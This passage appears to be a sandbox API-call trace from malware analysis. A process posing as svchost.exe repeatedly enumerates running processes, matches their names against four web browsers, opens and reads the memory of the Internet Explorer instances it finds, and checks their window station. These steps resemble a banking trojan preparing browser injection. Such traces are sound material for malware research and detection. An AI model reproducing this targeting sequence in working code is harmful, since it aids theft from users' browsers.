	[0200.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.583] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.583] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0200.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.584] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.584] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0200.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1cd0
	[0200.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.586] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0200.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.587] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.588] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0200.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.589] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0200.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1cd4
	[0200.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.590] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0200.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.591] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.592] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0200.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.592] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.593] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0200.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1cd8
	[0200.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.593] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0200.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.594] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.594] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0200.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.594] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.595] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0200.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1cdc
	[0200.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.595] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0200.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.596] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.596] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0200.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.597] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.597] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0200.598] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1ce0
	[0200.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.598] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0200.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.599] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.599] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0200.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.600] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.600] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0200.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1ce4
	[0200.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.601] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0200.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.602] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.602] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0200.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.602] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.602] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0200.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1ce8
	[0200.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.603] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0200.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.603] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.604] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0200.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.604] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.604] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0200.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1cec
	[0200.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.605] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0200.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.605] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.606] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0200.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.606] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.607] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0200.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1cf0
	[0200.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.608] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0200.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.608] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.609] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0200.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.609] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.610] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0200.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1cf4
	[0200.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.611] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0200.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.611] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.612] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0200.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.612] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.612] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0200.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1cf8
	[0200.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.613] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0200.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.614] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.614] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0200.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.615] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.616] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0200.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1cfc
	[0200.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.624] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0200.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.625] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.625] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0200.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.626] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.626] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1d00
	[0200.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.627] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.627] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.627] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.628] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.628] NtQueryInformationProcess (in: ProcessHandle=0x1d00, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.628] ReadProcessMemory (in: hProcess=0x1d00, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.628] ReadProcessMemory (in: hProcess=0x1d00, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.628] ReadProcessMemory (in: hProcess=0x1d00, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.628] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.628] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0200.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1d04
	[0200.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.629] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0200.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.630] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0200.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.630] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0200.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.630] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.630] NtQueryInformationProcess (in: ProcessHandle=0x1d04, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0200.630] ReadProcessMemory (in: hProcess=0x1d04, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0200.630] ReadProcessMemory (in: hProcess=0x1d04, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0200.630] ReadProcessMemory (in: hProcess=0x1d04, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0200.631] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0200.631] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0200.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1d08
	[0200.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.632] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0200.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.632] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.632] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0200.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.633] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.633] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0200.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1d0c
	[0200.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.634] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0200.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.634] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.635] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0200.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.635] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.636] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1d10
	[0200.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.636] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.637] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.637] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0200.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1d14
	[0200.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.639] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.640] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.640] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.640] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.640] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0200.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1d18
	[0200.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.641] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0200.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.642] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.642] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0200.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.642] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.642] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0200.643] CloseHandle (hObject=0x188) returned 1
	[0200.643] Sleep (dwMilliseconds=0x64) 
	[0200.742] GetCurrentProcessId () returned 0x110
	[0200.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0200.747] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0200.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0200.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0200.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1d1c
	[0200.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.753] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.754] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.754] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.755] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1d20
	[0200.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.757] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.758] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.758] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.758] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
